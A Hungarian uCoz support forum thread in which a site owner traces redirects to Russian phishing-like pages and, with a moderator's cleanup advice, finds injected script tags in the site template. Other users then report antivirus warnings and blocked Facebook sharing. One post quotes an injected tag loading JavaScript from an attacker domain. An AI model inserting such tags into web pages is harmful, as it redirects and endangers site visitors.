A magyar lokalizáció fejlesztése és támogatása jelenleg meghatározatlan ideig fel van függesztve, így ezen a fórumon kicsi a valószínűsége annak, hogy valaki segíteni fog. Gyorsabb segítséghez próbáld meg feltenni a kérdésedet az angol fórumon (ajánlott) vagy a uCoz Facebook oldalán.
uCoz közösség » A uCoz rendszer moduljai » Tartalmi modulok » A honlap hírei & Blog » Új jelenség, új probléma (http://56m7.ru)
Új jelenség, új probléma
Levin
Üzenetek: 162
Hírnév: 7

Üzenet # 1 | 04:10
Kedves Mesterek!
Először is el kell mondjam, hogy az új felület nagyon szép.
A problémám, és az oldalamat rendszeresen látogatók problémája az, hogy körülbelül egy hete időnként a http://ykbbb.ru/promo....lfnzbfm oldalra kerülünk, bár eszünkben sem volt oda lépni.

Tudtok erről valamit?

Hozzáadva (13.02.2013, 04:31)
---------------------------------------------
Az Ucoz szépülése, frissülése nagy örömmel tölt el, de van néhány kellemetlen kísérőjelensége is.
Sokan panaszkodtak az elmúlt napokban, hogy nem tudnak belépni az oldalra.
Ma reggel már én sem tudtam belépni biggrin
Az Unetre simán be tudok jutni, de a blogomba nem.
Mit tegyek? Próbálkoztam a jelszó-emlékeztetővel is, de nem ismeri fel a felhasználó-nevemet sem.

Hozzáadva (13.02.2013, 04:53)
---------------------------------------------
Megpróbáltam az adminisztrátori felületről belépni, onnan sem enged: helytelen loginnév vagy jelszó üzenettel.
Van-e valamilyen ötletetek?

Hozzáadva (13.02.2013, 05:08)
---------------------------------------------
Én kérek elnézést. A gondot az okozta, hogy előfizettem, és engedélyeztem a helyi felhasználókat is, így ettől kezdve nem az Unet adataimmal, hanem a már rég elfelejtett loginnév-jelszó kombinációval enged csak be.
Köszönöm a türelmeteket smile

Hozzáadva (30.05.2013, 02:44)
---------------------------------------------
Ez viszont tényleg új jelenség, és egyre nagyobb probléma:
Időnként, leginkább a bejegyzések szerkesztését követően egy orosz (vagy talán ukrán) nyelvű oldalon találom magam, amelynek elhagyása néha csak több kattintással lehetséges.
Tegnap az egyik moderátorunk a következőt írta:
"Sziasztok,
jelezném, hogy mobiltelefonon - bármilyen böngészővel is - a fejléc (header) alatt található menüpontokra klikkelve, pl.: fórum, csak egy Ukrán, vagy Orosz oldal tölt be, ami egy halom felesleges fájlt telepítene és kérné a telefonszámot is smile
Szerintem ez valami ügyes kis hack az oldalon sajnos.

Szeretném, ha foglalkoznátok a problémával, mert így pl. számomra elérhetetlen a fórum, amit sajnos a túlzott napi munkahelyen való tartózkodásnál, csak ott vannak szabad perceim, - pl. kajaszünet - hogy valamennyire követni tudjam az eseményeket.

Ha van valami fejlemény, akkor üzenjetek.
Előre is köszönöm szépen."

Csak az én oldalamon jelentkezik ez a probléma, vagy előfordul másnál is?
Nincs valami ötletetek a jelenség kiküszöbölésére?
Az oldal egyébként a vk.com.feed.14,oekri5.ru

Hozzáadva (30.05.2013, 03:10)
---------------------------------------------
Sajnos újra jelentkezett, legalább meg tudom mutatni, miről is van szó:




Az üzenetet szerkesztette Levin - Csütörtök, 2013.05.30, 04:14
vmarci21
A fórum moderátora
Üzenetek: 951
Hírnév: 52

Üzenet # 2 | 14:50
Levin, a képek alapkán (nagyon kicsik a képek, de) szerintem ez egy orosz közösségi oldal... (nem a http://vk.com/, hanem a másik... akkor is rá fogok jönni... )

Nem tusom, mi okozhatja a problémát, nincs az uCoznál semmi ilyen "fejlesztés"...

Partner és főmoderátor.

Kérdezés előtt használd a keresőt és a linktárat!
into.hu! | VideoRemote
Levin
Üzenetek: 162
Hírnév: 7

Üzenet # 3 | 04:30
Ha újra jelentkezik, megpróbálom a képeket nagyobb formátumban berakni.
És előre is köszönöm a segítséget.
Az üzenetet szerkesztette Levin - Péntek, 2013.05.31, 04:33
Levin
Üzenetek: 162
Hírnév: 7

Üzenet # 4 | 05:40
Hozzászólás szövege
Csatolmányok: 2777126.jpg (134.0 Kb)
vmarci21
A fórum moderátora
Üzenetek: 951
Hírnév: 52

Üzenet # 5 | 08:37
Levin, ez egy vk.com utánzat, egy adathalász oldalnak néz ki... Lehetséges, hogy valaki feltörte az oldalad?! (mert más UCozos oldalon nincs ilyen... ) sad cry
Partner és főmoderátor.

Kérdezés előtt használd a keresőt és a linktárat!
into.hu! | VideoRemote
Levin
Üzenetek: 162
Hírnév: 7

Üzenet # 6 | 11:10
Azóta más, hasonló oléddalak is bejelentkeznek, pl. a gocash.ru.

Mi a teendőm?
vmarci21
A fórum moderátora
Üzenetek: 951
Hírnév: 52

Üzenet # 7 | 11:58
Levin, szerintem nálad van a gond:
1.: jelszó-módosítás (profilod/admin-menü)
2.: adminisztrátorok jogainak csökkentése (nem szerkeszthetik a sablont/az oldalakat, és cikk/hír/stb. esetén NINCS HTML)
3.: nézd át a sablont, és ha valami furcsa linket js-t találsz, akk. azt szedd ki. //a fájlok között is nézz körül!
4.: Ha ez nem segít, akkor hibabejelentés az uCoz ügyfélszolgálatán (uCoz.hu - kapcsolat (oldal alja) / ucoz.com ugyan ez angolul)

Partner és főmoderátor.

Kérdezés előtt használd a keresőt és a linktárat!
into.hu! | VideoRemote
Levin
Üzenetek: 162
Hírnév: 7

Üzenet # 8 | 16:16
Első két ponttal végeztem.
Kezdem a harmadikat. Mit értesz azon, hogy a fájlok között is nézzek körül? A feltöltött fájlokra gondolsz?
Persze van második kérdésem is: a Külalak szerkesztése > Sablon módosítása alatt egyenként nézzem át a Globális blokkoktól a Bejegyzések kinézetéig terjedő valamennyi pontot?

Időközben már nem lehet a Fórumomba belépni, mert átirányít a Ww2.ru3.biz-re sad

Hozzáadva (18.06.2013, 14:57)
---------------------------------------------
Megtaláltam!
A Felhasználók belépési oldalán:
<script language="javascript" src="http://gocash2.ru3.biz/js/back.php?id=54"></script></head>

Hozzáadva (18.06.2013, 15:16)
---------------------------------------------
Találtam még egy csomót, mindenhol a <head> végére voltak beírva. Töröltem őket, és elmentettem a sablont.

Kedves vmarci21, úgy néz ki, sikerült.
Nagyon szépen köszönöm a hasznos segítséget smile

Az üzenetet szerkesztette Levin - Kedd, 2013.06.18, 15:55
vmarci21
A fórum moderátora
Üzenetek: 951
Hírnév: 52

Üzenet # 9 | 17:57
Levin, még javaslom, derítsd ki, ki volt az, aki ezt csinálta:
Aki csinálta, annak volt joga a sablont módosítani (ez alapesetben csak az adminisztrátorok közül valaki lehetett...)

Partner és főmoderátor.

Kérdezés előtt használd a keresőt és a linktárat!
into.hu! | VideoRemote
sumegmento
Üzenetek: 17
Hírnév: 0

Üzenet # 10 | 15:18
A következőkben kérném a hozzáértők segítségét:
A weboldalamon - http://sumegmento.ucoz.hu/ - beraktam egy megosztásmodult.
Ez viszont a Facebook-os megosztásoknál furcsán működik -ill. nem működik.
FB-s megosztásnál először ez jön :
http://www.kephost.com/view3.php?filename=a1_2013_6_24_mjfr98k4a4.jpg
ha bejelentkezek a fb-ra ;akkor meg ezt dobja vissza:
http://www.kephost.com/view3.php?filename=a1_2013_6_21_pvc6rbvd5r.jpg
Namost szerintem sem unsafe sem spammy nem vagyok. Mi lehet a megfejtés?
admin2412
Üzenetek: 8
Hírnév: 0

Üzenet # 11 | 11:04
Sziasztok!

Szeretnék honlapomra a www.szentvid.ucoz.hu-ra belépni, de mindig az AVG ablak jön be és figyelmeztet, hogy HTML/Frame vírust talált. A honlapra pedig nem enged belépni! Próbáltam törölni az előzményeket, nem segített, aztán próbáltam másik gépről, másik böngészőből belépni onnan sem lehet!
Segítségeteket előre is köszönöm! Üdv: Ákos
elek1977
Üzenetek: 5
Hírnév: 0

Üzenet # 12 | 02:41
Nekem is ezt írja ki.

Én még is tapasztaltam: A facebook letiltotta az ucoz linkek közzétételét. Valamint hajnali órákban elég nagy számban nézegették az oldalamat.
admin2412
Üzenetek: 8
Hírnév: 0

Üzenet # 13 | 17:43
Szia Elek! Ez nekem is megvan!!! Nem enged a fácsin osztani, de én azt hittem az gagyizik! angry
Talán a Mesterek kitalálnak valamit!
elek1977
Üzenetek: 5
Hírnév: 0

Üzenet # 14 | 22:24
Elképzelhető, hogy a HTML/Frame vírus miatt nem enged osztani a Facebookon. Már csak az a kérdéses, hogy tényleg van van vírus, vagy csak az AVG vacakol? A másik riasztó dolog pedig az, hogy ki vagy kik azok, akik hajnali ötkor egy nem túl népszerű Ucoz oldalt látogat? Hogy pontos legyek az enyémet? Napközben is elég, a 1-2 látogató volt, nem hogy 13. Lehet, hogy csak a Google térképezte fel, de egy kicsit aggodalomra adott okot.
Mivel nem vagyok profi weblapszerkesztő, jobbnak láttam, ha egyelőre zárom az oldalt.
admin2412
Üzenetek: 8
Hírnév: 0

Üzenet # 15 | 10:12
Én egy ideig hozzáadtam az oldalam az AVG-ben a kivételek közé, úgy beengedett. De paráztam, hogy tényleg vírus és inkább kivettem onnan! Valamelyik kommentben olvastam, hogy az ucozos oldalak több mint felel nem működik rendesen, talán pont ezért. Azért a moderátorok szólhatnának valamit!!! angry
uCoz közösség » A uCoz rendszer moduljai » Tartalmi modulok » A honlap hírei & Blog » Új jelenség, új probléma (http://56m7.ru)
Keresés: